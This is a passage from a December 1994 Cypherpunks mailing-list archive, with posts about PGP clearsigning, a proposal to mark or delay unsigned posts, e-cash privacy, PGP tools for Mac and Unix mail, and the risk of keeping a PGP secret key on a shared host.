exponentially dicier when you try to scale it to an international level (assuming you want to try to continue to work within the legal frameworks of the various countries, and probably even if you don't want to.) Now, take bankruptcy, and replace it with "systematic fraud." Suppose that the same fine type of folks who got involved in S&Ls get into e-cash in a big way... the mind boggles. From shamrock at netcom.com Thu Dec 1 16:33:48 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 1 Dec 94 16:33:48 PST Subject: Eric's proposal has already helped! Message-ID: <199412020033.QAA28597@netcom18.netcom.com> Eric's proposal to get us to use clearsigs has already done some good: It made me use the Mac PGP 2.6 ui clearsig feature for the first time. As many of you told me, my sigs don't check out. I didn't have that problem with other versions of PGP. I don't know what causes the trouble (the message that I send out is fine, the message I get back isn't), but I know that once I'll figure it out my tools will have improved :-) -- Lucky Green PGP encrypted mail preferred. "The very atmosphere of firearms anywhere and everywhere restrains evil interference - they deserve a place of honor with all that's good." From tomaz at cmir.arnes.si Thu Dec 1 16:52:05 1994 From: tomaz at cmir.arnes.si (Tomaz Borstnar) Date: Thu, 1 Dec 94 16:52:05 PST Subject: using us crypto sw outside usa Message-ID: <199412020051.BAA13040@cmir.arnes.si> Hello! I was wondering what is the legal status for using rsaref ooutside usa. Is it legal or not? Also, what is the legal status of RC4 code posted to the net? Thanks, Tomaz From eric at remailer.net Thu Dec 1 16:53:25 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 16:53:25 PST Subject: Where to get PGP for SunOS In-Reply-To: Message-ID: <199412020152.RAA14315@largo.remailer.net> Did you look at ftp.csua.berkeley.edu? The cypherpunks directory has a whole bunch of PGP versions, including the latest generic Unix one, as I recall. Eric From cactus at bb.hks.net Thu Dec 1 16:53:48 1994 From: cactus at bb.hks.net (cactus at bb.hks.net) Date: Thu, 1 Dec 94 16:53:48 PST Subject: Cypherpunks@hks.net service Message-ID: <199412020058.TAA05511@bb.hks.net> [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] -----BEGIN PGP SIGNED MESSAGE----- The cypherpunks at hks.net service is now available. It will sign any message sent to cypherpunks at hks.net with its (currently 384 bit) key and forward the signed message to cypherpunks at toad.com. The key for the server is: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQA9Ay7eB60AAAEBgOGkDzo6mkSp3G4W3EXwMWK8SrTVSmosuN5Y7Z2FdBS5uJ3o 1O0XNAwqGc8CJ9W3bQAFEbQuQ3lwaGVycHVuayBzaWduaW5nIGFnZW50IDxjeXBo ZXJwdW5rc0Boa3MubmV0Pg== =ajZM - -----END PGP PUBLIC KEY BLOCK----- I welcome any suggestions on the format of the message and the prepended message. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt5xMyoZzwIn1bdtAQEItQGAzXF0V/4buTcY9Ry0iGsiqjpq3o6jYRr7 E6QAlTsBd5Xy9k8v/ttlXcbEIHNLuhu8 =19Vo -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 16:58:36 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 16:58:36 PST Subject: recent voice over data In-Reply-To: <9412012302.AA02541@pig.die.com> Message-ID: <199412020157.RAA14321@largo.remailer.net> From: "Dave Emery" I can't quite see how this would work unless the voice was run at a very low level relative to the data. I believe there are also maximum rates on the data when used with voice (4.8 kbps?) and the modulation doesn't use echo cancellation. With the lower bit rate you can get away with a lot, particularly with modern DSP's. Eric From eric at remailer.net Thu Dec 1 17:07:08 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 17:07:08 PST Subject: Brands excluded from digicash beta In-Reply-To: Message-ID: <199412020205.SAA14356@largo.remailer.net> From: jamiel at sybase.com (Jamie Lawrence) And that rule of thumb completely ignores the fact that if a transaction is fouled up anywhere along the line, one finds extensive legal liability involved instead of a 'mere' corrupt table in a database. When the algorithms include "Call legal dept. and sue", the ability of most programmers to design systems goes out the window. Jamie's estimate of the magnitude of the problem is probably overstating the case, but not much. Eric From j.fletcher at stirling.ac.uk Thu Dec 1 17:15:10 1994 From: j.fletcher at stirling.ac.uk (Jonathon Fletcher) Date: Thu, 1 Dec 94 17:15:10 PST Subject: Eric, please can you clarify Message-ID: <9412020112.AA23439@forth.stir.ac.uk> Eric, Can you clarify your intention for the list ? I'm a little puzzled by the alternatives that are flying about. You initially stated an intention to delay (eventually bounce) unsigned messages to cypherpunks list. A couple of posts back you talked about "This is an unsigned message" headers in messages. Are you intending to implement both of these, one of these, or one now and the other later ? What type of checking are you intending on signatures - just syntax or signature verification ? I apologize for asking for clarification, but I've lost the signal in amongst all this noise. -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk (X400: "/S=jf1/O=stirling/PRMD=uk.ac/C=gb/") From merriman at metronet.com Thu Dec 1 17:30:29 1994 From: merriman at metronet.com (David K. Merriman) Date: Thu, 1 Dec 94 17:30:29 PST Subject: FYI: Eudora and PGP Message-ID: <199412020130.AA20093@metronet.com> > > > All of MacPGP 2.3v1.1, MacPGP2.6ui, and Viacrypt PGP 2.7 can >be driven via the use of AppleEvents, by the macpgp kit. This leads >one to believe that all three use the same suite of events. My >scripting environment is broken, so I can't actually test to see that >the entire suite is the same. > > The macpgp kit can be found at >duke.bwh.harvard.edu:/pub/adam/mcip Now, if there was just something for us PC Eudora users...... Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From tjb at acpub.duke.edu Thu Dec 1 18:03:13 1994 From: tjb at acpub.duke.edu (Thomas J. Bryce) Date: Thu, 1 Dec 94 18:03:13 PST Subject: Update of Secure Edit a0.3.3->a0.3.4 Message-ID: <199412020203.VAA09192@carr2.acpub.duke.edu> -----BEGIN PGP SIGNED MESSAGE----- UPDATE/PATCH OF *SECURE EDIT* for Mac FROM a0.3.3 to a0.3.4 (AND MAILING LIST NOTICE) There was a bug in Secure Edit a0.3.3 that would cause it to crash when setting a default startup pass phrase on 68k macintoshes, but not power macintoshes, which is what I was testing it on. I was not planning to release any upgrades before a major update and release in which I would overhaul most of the program, including changes advised by Colin Plumb and others. However, I thought this was important enough to release a patch. I have uploaded a patch to upgrade a0.3.3 to a0.3.4, as well as a a0.3.4 package, to ripem.msu.edu in the directory /pub/crypt/mac. These correct the bug. However, please save your work regularly as well as before using this feature, just to be safe. I am overhauling much of the program completely for the next release. The method for verifying the default password has also been changed from the previous "baroque" method. Now, it takes the MD5 hash of the key, encrypts this hash on the key, and uses the first 8 bytes of the resulting ciphertext to validate the default startup key. Please report any problems/suggestions/improvements you may have regarding Secure Edit. Also, if you wish to be on a list of email addresses that will receive information about Secure Edit updates or other Miyako Software releases, please send me an email to that effect. Anonymous IDs are, of course, fine. No code will ever be sent by email. Actual programs and source code must be FTP'd from ripem.msu.edu Miyako Software tjb at acpub.duke.edu -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLt4R708YjrUhOUC5AQE0dQP7BvOWvOe6B1edvJ07RJ60UodPXoYAOmOX DQ6AueVoqrfcYqvstaHQrHl/9V6Ie9P9KbQLdxlHk7CbIsyKgdwOs5YOmUSYB01V YeIpp1YYkNa/ztpdcREtIGA4ghQMU/ijU7Ni6b/kLiITTSMr4HUosvBVEpMkh9Bw 93J/BzpvpO4= =m0R+ -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 18:10:41 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 18:10:41 PST Subject: E-money Good or Bad? In-Reply-To: Message-ID: <199412020309.TAA14459@largo.remailer.net> From: KDAGUIO at aba.com Welcome to cypherpunks, Mr. Daguio. Steven's article was unclear (to me, at least), about just what you do for the ABA. Could you provide a more lengthy introduction? Whoa! Much of content of the discussions I had with Mr. Levy concerned the importance of protecting privacy and security for everyone. None of those comments made the cut. Yes, I have concerns about fully anonymous digital cash, but while I am not a full on crypto-anarchist, neither am I a crypto-facist. There are two senses of the phrase "protecting privacy and security for everyone". The first, that I favor, construes the context strictly, that is, privacy and security with respect to only the transaction system in question. The second construes the context broadly, taking into account anticipations external to the system to arrive at a judgement of what constitutes protection. It appears that you, Mr. Daguio, are much closer to the second than the first; if this is inaccurate, please correct me. I believe these two notions of protection are irreconcilable with each other. Protection of privacy to me means that only me and my counterparty know that we have transacted and how much we have transacted. Digital cash techniques address the first of these and my own Remote Auditing protocols can be used for the second. Note that I did not say that the bank need know, because both these technique allow the bank to remain willfully ignorant and yet have an assurance that they, the bank, are not at risk. Protection of security means protection against fraud and assurance of continuity of service. On the other hand, if we assume that protection of security means that the populace should be protected against narcoterrorists by denying them a conduit for funds, then the strong privacy referred to above cannot b maintained. Nor even, in fact, can the security be maintained, as a recent seizure of funds in transit inside New York indicates. (Very delicate work; the window of opportunity for the feds was on the order of an hour, as I recall, and even though they needed a court order, they hit it.) I am partial to the first because, at a deep level, it can be stated exactly what the requirements are, and relatively concisely. The second interpretation requires any number of assertions about the outside world and its chains of causality. Moreover, the second interpretation includes a significant amount of discretion by public officials who are not directly accountable to the public. Not one of the executive branch officials in charge of financial matters, however construed, is elected. Congress has ceded discretionary authority to regulators and has largely left the task of interpretation to them. This discretion with respect to what constitutes security is, to me, a Very Bad Thing. At the whim of a department, it may suddenly be declared that something new is now disapproved of. The color of law is used to justify these changes, but they coincide neither in necessity nor in sufficiency with the law. To my knowledge, there was no intensive and large scale investigation into Rostenkowski's affairs, much less the Clintons's commodities, questionable activities, if true, certainly constitute bribery. In a parallel issue, the FBI is known to have intercepted (legally, mind you) credit card purchases for grow lights, unquestionably legal even if associated with one of the least significant forms of drug use. So not every illegal thing is followed (not even the most serious) and legal things are. Let me ask you a question. If people can communicate over the net anonymously, tranmit unreadable messages, and transfer unlimited amounts of fully anonymous money, haven't you, in addition to protecting some of the interests of minorities, also perfected a mechanism by which people with evil intent can engage in criminal activities completely unobserved and with no fear of prosecution? No, we have not. What we have perfected (assuming your hypothetical) is a system where anybody with whatever intent can move money around with a strong assurance of predictability. This is manifestly _not_ the same as engaging in criminal activities completely unobserved. To pick only the most obvious examples, drug organizations still need to manufacture and distribute, and these will always remain very tangible activities. I have always believed that people won't come outside to play with you unless they feel safe. We want electronic commerce to work everywhere in the world. Well we want it to work everywhere in the world, too, because that increases the opportunity for regulatory arbitrage. A parallel with eurocurrency markets is instructive. If England allows an anonymous system and the USA doesn't, then I'll open up a eurodollar account in England and transact there. If England doesn't want to allow the system to operate there, but is willing to hold dollars for another bank in, say, Hong Kong and Hong Kong allows anonymous transaction, I use a dollar account there. In fact it's because of the ability to perform transactions of this nature at arbitrary points in the globe that anonymous systems will be very difficult to prevent in the long term. There will be money in it, you see, and military protection and fiber optic cable is not particularly expensive for a national government which wants a new industry, like, say, India or South Africa or Vietnam. There's a distinct possibility that the first country to deploy these systems will set up a new world financial center, and that's playing for the big time. Eric From lmccarth at ducie.cs.umass.edu Thu Dec 1 18:14:01 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Thu, 1 Dec 94 18:14:01 PST Subject: public accounts / PGP / passphrases Message-ID: <199412020218.VAA06287@bb.hks.net> [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Hal writes: > Just create a special key for your netcom account. Use no pass phrase; > using one would give a misleading sense of security IMO. Just pass your > mail through "pgp -saft" or equivalent and you've got it. It is easy to > do this from most editors. Could someone please elaborate on the foolishness of using PGP with a passphrase on a public machine (as I do) ? Am I wrong in thinking that my secret key is useless to an intruder until she guesses my passphrase ? I have no net access except via an account on a public machine, so I'm not about to start storing my secret key elsewhere, but I'll change my passphrase to if it's irrelevant anyway. I just reviewed the PGP docs a bit and Phil says "Nobody can use your secret key file without this pass phrase.", which seems to contradict what many people on the list have said. - - -L. Futplex McCarthy; PGP key by finger or server "Don't say my head was empty, when I had things to hide...." --Men at Work - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt6Cq2f7YYibNzjpAQF3KwP/ZgxKliBQe+BQ+Q0FfiN9ycxTRWRHlPWY qF4iqmxT70uWLm6hsSX6A88EKv1E+k4mfYhVAnT8XQCTp2wEYMVOHvlFJQiKHOCj 55Cot8bL7JCrJ+lUIDdCPOnNra61F2cc+S26EyB5jIKvudzkPLsWI49galG201M7 ILld5lrJhAw= =vc9N - -----END PGP SIGNATURE----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt6D+ioZzwIn1bdtAQGz5gF+Kokq6ZW/HpgRWowG2/+3QB913tJD2opJ +gKNrxqTK40qzj/8pdNNpreKYrf4rWIi =9YBk -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 18:21:13 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 18:21:13 PST Subject: Eric, please can you clarify In-Reply-To: <9412020112.AA23439@forth.stir.ac.uk> Message-ID: <199412020320.TAA14480@largo.remailer.net> From: Jonathon Fletcher Can you clarify your intention for the list ? I'm a little puzzled by the alternatives that are flying about. The first time this got debated was last year. There the proposal was check sigs, delay, eventually bounce. That's not what I'm proposing this time. I mentioned this again, and the discussion started up again. Almost at once I wanted to avoid the flames from the previous time, so I restricted the proposal to be for marking and delaying only. Are you intending to implement both of these, one of these, or one now and the other later ? First of all, I'm not "planning" on any right now. I am considering doing some of them and I have decided to do some related work. The first action would be autonag; messages sent back to non-signers from the server. The second would be automark; header fields for advocacy would be added to the messages. The third would be delay for some as yet unspecified interval. The timing of these is not decided, and would certainly be iterative. What type of checking are you intending on signatures - just syntax or signature verification ? At first, only syntax checking. The problems of key distribution prevent otherwise. I apologize for asking for clarification, but I've lost the signal in amongst all this noise. No, actually, a summary was in order. Eric From lmccarth at ducie.cs.umass.edu Thu Dec 1 18:22:39 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Thu, 1 Dec 94 18:22:39 PST Subject: making public keys public Message-ID: <199412020227.VAA06380@bb.hks.net> [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Eric writes: > someone (Alex Strasheim ?) writes: > Perhaps we would have > a default web, which would have everyone's key in it. > > This is a really bad idea. Some "public" keys should not be made > public, but rather revealed only to the correspondent. Forward > secrecy is the reason. If the public key has never been in the > possession of an opponent, and assuming the results of the public key > operation yield little or no information about the modulus, then when > the keys are changed and destroyed, no amount of factoring can find > the private key because the public key isn't around to factor. If you're not going to make the public key public, why use public key cryptography at all ? Save time and effort and use a symmetric cipher. - - -L. Futplex McCarthy; PGP key by finger or server "Don't say my head was empty, when I had things to hide...." --Men at Work - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt6Eq2f7YYibNzjpAQGIJQQAvKd0jyHXkaNfXp787EXQl/dXMYUXz8dB dF9NF9tiYp761ZwtkeKOoASZGYWvygO+8nseE/1pFz9Gns1XkUM0uyHvg4nvgIWj CJHtVsbV2rtRFZfIjDwD3wqsfRTRms5JvFcRpUsOSKol93hcabnIf3Vx9EAdIUSv hEtvQUBhzKY= =3yjE - -----END PGP SIGNATURE----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt6F9SoZzwIn1bdtAQFUvwGAhbycPCwIjZGjGeNMWkgnxQUJw6v2RpU3 Z2hvAV6sSiz3+wyLlkR+Nz9nTgRHqjWT =RaG/ -----END PGP SIGNATURE----- From alex at omaha.com Thu Dec 1 18:32:45 1994 From: alex at omaha.com (Alex Strasheim) Date: Thu, 1 Dec 94 18:32:45 PST Subject: autodecrypting incoming mail Message-ID: <199412020224.UAA01009@omaha> -----BEGIN PGP SIGNED MESSAGE----- I've been fooling around with scripts which automatically decrypt incoming mail, and I'm curious about how others are approaching the problem. In particular, I'm interested in how Mime gets mixed in. A problem with using a script which acts as a PGP aware pager to display mail is that it would choke on certain types of Mime data, an attached binary, for example. The best solution to this problem would be a PGP aware Mime mailer, but that's too hard for me, so I've been playing around with scripts which will transform mail spool files with cyphertext in them into mail spool files which are all plaintext. First of all, I'm assuming that premail was used to encrypt the mail automatically. To try to get a handle for what's going on with the headers, I've been sending mail from elm, pine, and /bin/mail and seeing how they vary as encryption is added. When encryption is used, premail always uses Mime headers, with a Content-Type field that says "application/x-pgp; format = mime". When encryption isn't used, elm doesn't use Mime headers, but Pine does. There are a few other differences between the various mail programs as well. Elm, for example, has header fields which say how long the body is, while Pine doesn't. This makes me wonder if the transformation that premail uses on outgoing mail is a reversible process. Is it possible to transform a mail spool file so that it's exactly as it would have been if premail encryption hadn't been used? It's pretty obvious that we don't need it to be completely reversible: all that's needed is a header that will match the plaintext body. But what factors need to be considered when the new header is constructed? Specifically, which header fields would have to be modified? Signatures complicate things further, because they add information to the letter which has to be included in the plaintext somehow. If the same letter is sent twice with the same software, one signed and encrypted by premail and the other sent normally, it's not good enough to transform the first into a copy of the second. Somehow the user has to be told if the signature checked out. Is it possible to add a Mime section that would contain this information? Suppose, for example, we use Pine to send a letter. The letter contains normal text and an attached binary. This would mean that it would contain two sections in the body. Does it make sense to decrypt the letter, check the signature, and construct a new three section body, with the added section containing the results of the signature check? If we do that, how can we make the mailer display it? I'm sorry to ask so many basic questions, but I don't know much about Mime. I started using elm a long time ago, and I've stuck with it because it's comfortable. I don't have a lot of experience with Mime mailers. (If anyone could suggest a good cutting edge unix Mime mailer, I'd appreciate the pointer: I think just using the software would help a lot.) Thanks, == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt6FUxEpP7+baaPtAQGbrAQAoWCj9ilFdE59fj+6beOYdv8MGQ3BtlMP ClfdJkQhbUheJx+vKtlvfw3/Cz8qiHpxy0QHqLbXzpTKrdN36xp1IbnAmFDGoFBz pjaBZdLMI/Izjein6aeardeKnwnhgVC1X6jgrQUhYfRsa0fHzx1Hl9PXucgckHHn gkQKsuIauR0= =82Jv -----END PGP SIGNATURE----- From jya at pipeline.com Thu Dec 1 18:40:21 1994 From: jya at pipeline.com (jya at pipeline.com) Date: Thu, 1 Dec 94 18:40:21 PST Subject: NYT Potpurri and Econo-cash Message-ID: <199412020245.VAA06561@bb.hks.net> [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] -----BEGIN PGP SIGNED MESSAGE----- John Markoff writes today on an interview with Michael Spindler, chairman of Apple. Here're some tidbits: "And flirting with heresy, Mr. Spindler says he sees no need for the so-called information superhighway. And 500 channels? Sixty are plenty. 'This is not going to be an all-electronic world where we all sit on a couch and are force-fed a constant stream of information,' said Mr. Sindler." "Mr. Spindler took pains to contrast himself with two of his industry's rivals -- and vaunted visionaries -- William H. Gates, chairman of Microsoft, and Andrew S. Grove, chairman of Intel. 'They believe that just because of technospeak it's going to happen, but it's not,' said Mr. Spindler." "And yet, Mr. Spindler, even as he decries the industry's preoccupation with the so-called vision thing, acknowledges that there are still ways of improving the life of the computer user. 'We still have to switch our computers on and off,' he said. 'We go to the restroom, and when we leave it flushes automatically.' " And, on Mr. Schindler's daring mis-speak, note others today parlaying technospeak and adverting profitably in The Times just like the Forbidden Fruit: "I.B.M. to Replace Pentium Chips in Some Machines" [Company News] "Takeover Talk Pushes Lotus Shares Up", by Glenn Rifkin. "A Challenge to Microsoft in Interactive TV", by Lawrence Fisher. "Prodigy Testing Link to World Wide Web", by Peter Lewis. "I.B.M. Makes Board Change". - ------------------ For those yearning to see the November 26 not-so-short article on e-cash in The Economist mentioned here twice and lavishly praised by one reputable cpunk: Send blank message with subject: ECO_do. [If remailer hks.net is a sucker punch I'm hit.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt6KLioZzwIn1bdtAQFv0wGAo5bKL0EOmdTpYtQ871U/ZU1b6rPiCidL JXWT+yggmo7oPFn+avTw+EtrTl8fCn0A =mb5r -----END PGP SIGNATURE----- From warlord at MIT.EDU Thu Dec 1 18:43:09 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 1 Dec 94 18:43:09 PST Subject: public accounts / PGP / passphrases In-Reply-To: <199412020218.VAA06287@bb.hks.net> Message-ID: <9412020242.AA10706@toxicwaste.media.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- To: lmccarth at ducie.cs.umass.edu cc: cypherpunks at toad.com Subject: Re: public accounts / PGP / passphrases > Could someone please elaborate on the foolishness of using PGP with a > passphrase on a public machine (as I do) ? Am I wrong in thinking that my > secret key is useless to an intruder until she guesses my passphrase ? I > have no net access except via an account on a public machine, so I'm not > about to start storing my secret key elsewhere, but I'll change my passphrase > to if it's irrelevant anyway. I just reviewed the PGP docs a bit and > Phil says "Nobody can use your secret key file without this pass phrase.", > which seems to contradict what many people on the list have said. For someone to use your secret key, they need two things: 1) Access to your secring.pgp file, and 2) Your passphrase On a public system, 1) is easy (relatively speaking). 2) is more difficult, but someone could theoretically listen in to the line anywhere between your keyboard and the CPU. What do you know about what's going on on the other end of the phone line? My rule of thumb (for me) is to only use PGP when I have direct control over everything between the keyboard on which I am typing, and the CPU on which PGP is running. This doesn't mean that you _can't_ run PGP on a public machine. It also doesn't mean that you _shouldn't_, either. It is a matter of security -- how secure do you want your key to be. If you really don't mind it being insecure, you might as well generate a 384-bit key (which has been proven by RSA-129 to be insecure to an amateur attack). What do you use to contact your public machine? Do you dial in from home? What kind of machine do you have at home? You might consider running PGP at home if that is at all possible. It would be nice to integrate PGP into terminal emulators, too, like kermit or seyon or red ryder or whatever, so that you could easily use PGP locally to sign/encrypt things on the remote end. Wishful thinking, I guess... Does this help? - -derek -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLt6Jjjh0K1zBsGrxAQEo+ALFEwLyrvYtScjSWOPVhwdFT9SByDCRYset 5H/1tupjC3M1RFINVj80sxMFZT4kdvKj2IR6dMbKzbFaqVFw7lAWPhF6Yfwk2q6O gWhx+G3VrJoRm4gEHNFIVMA= =DKmQ -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Thu Dec 1 18:54:37 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 1 Dec 94 18:54:37 PST Subject: public accounts / PGP / passphrases Message-ID: At 9:18 PM 12/01/94, lmccarth at ducie.cs.umass.edu wrote: >Could someone please elaborate on the foolishness of using PGP with a >passphrase on a public machine (as I do) ? Am I wrong in thinking that my >secret key is useless to an intruder until she guesses my passphrase ? I >have no net access except via an account on a public machine, so I'm not >about to start storing my secret key elsewhere, but I'll change my passphrase >to if it's irrelevant anyway. I just reviewed the PGP docs a bit and >Phil says "Nobody can use your secret key file without this pass phrase.", >which seems to contradict what many people on the list have said. Theoretically, your sysadmin could quite easily get ahold of your passphrase, through a number of means, including logging all of your keystrokes. As a general rule of thumb, the sysadmin can do anything. I'm also don't have the crypto-math knowledge to know whether it's easier to crack your IDEA-encrypted passphrase then it would be to crack your private key only having some ciphertext and perhaps some corresponding plaintext in your possession. It certainly would be easier to crack your passphrase if you use a bad passphrase, like an english word. Generally, I think you don't want your private key falling into the wrong hands, passphrase encrypted or not. So if your sysadmin actually wanted to, your sysadmin could get at your key. Now, obviously this doesn't mean that your passphrase might as well be null. Nor does it mean there's no reason to use PGP at all if your only option is using it on a time-shared machine. I have a feeling that many people who don't know better think one of these two things after seeing all of the messages on this list that say "Don't use PGP on a time-shared machine! It's useless!" It's not useless, although you are losing some security by doing so. It's only a false sense of security if you don't understand exactly how much security you are losing. [and admittedly, I don't understand _exactly_ how much, myself. But then, I'm not using PGP on a timeshared system at the moment.] From adwestro at ouray.Denver.Colorado.EDU Thu Dec 1 19:13:56 1994 From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope) Date: Thu, 1 Dec 94 19:13:56 PST Subject: AUTOPGP In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Anyone know where I can get a copy of AUTOPGP? I'd like to try it out > and see whether it has any advantages over YARN's integrated PGP functions. > Mark Terka | werewolf at io.org It's at oak.oakland.edu (and, presumably, all mirror sites) as: pub/msdos/offline/apgp212.zip I use both Yarn and AutoPGP; each has different strengths. I find that for Internet use Yarn meets almost all my needs, but AutoPGP comes in very handy for occasional use, mainly with QWK packets from bbs's. BTW, signing and/or verifying email and Usenet posts is a snap for me, so I'm pretty indifferent to the recent debates here. But -- as usual with public-key crypto -- key management is the rub: I don't want to snarf all ~6,000 keys from the servers, nor to grab keys piecemeal via email/ /finger/www every time I encounter a signed message from a cypherpunk who's not currently in my key ring. I could, of course, just continue to ignore signatures, but Eric's proposal may turn into quite an interesting experiment, judging from the responses thus far. :-) Has anyone considered setting up a site where only folks on this list could store and retrieve keys? Perhaps a single file containing keys for the hundred or so active posters that could be ftp'd and stored as a secondary key ring...cpunkeys.pgp or whatever. I'd really prefer to keep my main key ring small so that access is quick (well...semi-quick). Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt6PAFRRFMq4NZY5AQGH+AP8Cbd6cORaJgnwTohktryE/Ljk/tlRxASM uB9Bnl8rSwA+YZgBfCuzkU5hrBTkpIIbf4aJeSWxYufJ+mluZwLpq2hvWWKuwXmd 3G9XCSPBw3Inb+vDP0r+iITRTNpihT7M1HBtGlRqhTbZQf35YfLL6EzqLSO5y2JS CJmT45pmhfc= =nk1A -----END PGP SIGNATURE----- From jamesd at netcom.com Thu Dec 1 19:15:19 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 1 Dec 94 19:15:19 PST Subject: Mighty morphing power cypherpunks In-Reply-To: <199412020320.TAA14480@largo.remailer.net> Message-ID: <199412020315.TAA20817@netcom8.netcom.com> Eric Hughes writes > At first, only syntax checking. The problems of key distribution > prevent otherwise. So autonag every nym to send a public key in. Every email has its nym checked. No key for that nym, auto nag Discrepant signature, flag. No signature, autonag. This would be actually useful. It provides a benefit, thus demonstrating the usefulness of crypto, and would achieve the goals that you desire (get us to sign our stuff) without making us look like seven year olds. What you are proposing provides no benefit. It is crypto for the sake of crypto. This makes us look like kids in mighty-morphing-power-ranger suits, playing with captain Krunch secret decoder key rings. A check on syntax without semantics looks pathetic, in the same way, and for the same reasons, as a captain Krunch secret decoder ring. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From rsalz at osf.org Thu Dec 1 19:25:46 1994 From: rsalz at osf.org (Rich Salz) Date: Thu, 1 Dec 94 19:25:46 PST Subject: public accounts / PGP / passphrases Message-ID: <9412020321.AA07870@sulphur.osf.org> > >Could someone please elaborate on the foolishness of using PGP with a > >passphrase on a public machine (as I do) ? Am I wrong in thinking that my > >secret key is useless to an intruder until she guesses my passphrase ? The sys admin can change the kernel running on your machine. A special kernel can be built so that when a particular user is typing on a tty and the executing process is named "pgp" then all keystrokes they type are recorded into a file for the administrator to read later on. The local machine must be part of the trusted computing base. /r$ From tcmay at netcom.com Thu Dec 1 19:30:38 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 19:30:38 PST Subject: Why nothing works [Was: Mandatory sig workaround] In-Reply-To: <199412012323.PAA12571@netcom13.netcom.com> Message-ID: <199412020330.TAA05366@netcom10.netcom.com> Wow! Maybe becuase I am just now having my first evening drink (to paraphrase someoone who spoke about having his first morning cup of coffee), but I find Lucky's message *dead on*. Lucky Green wrote: > There is no hacking in the world that could create the kind of tool that > would be needed to satisfy Tim. What would be required to satisfy Tim can't > be done and I think that most long time CP's are be well aware of that. We > have had this discussion over and over for many issues (PGP, MIME,..) for > the last two years. I was starting to get my hackles up at this point, preparing to rebut Lucky's claims, until... > The problem isn't that there are no tools for Tim's Mac, the problem is > that there is _no way_ to do all these things on Netcom's UNIX host. > > 1. Tim: "I can't do any of the new things you are proposing because I don't > have the tools." > 2. Some CP: "Just download your mail to your local machine and process it > there. There are many great ways to automate this on a Mac." > 3. Tim: "I don't want to have to download mail for processing. I want to be > able to do it all on Netcom's machine." ...rest elided... A fair summary of the situation. And I consider the slight benefits of signing to not be worth the effort of changing the tools I have managed to get working over the past couple of years. By the way, Rishab mentioned getting PGP integrated into Netscape (or other Mosaic-like tools). I heartily concur, and even made an impassioned plea for this at the last CP meeting. Netscape and a SLIP or PPP connection is what I expect to be shifting too as things shake out, as versions become real, etc. (I've mentioned this before.) Also, Netscape the company (formerly Mosaic Communications) is seeking to hire someone to do this. A clear opportunity for a Bay Area CP to do something good and also probably become a millionaire. (3,000 millionaires were created by Microsoft's success, and Mosaic-Netscape may be comparable in success.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From VAMAGUS at delphi.com Thu Dec 1 19:31:40 1994 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Thu, 1 Dec 94 19:31:40 PST Subject: PGP Sig 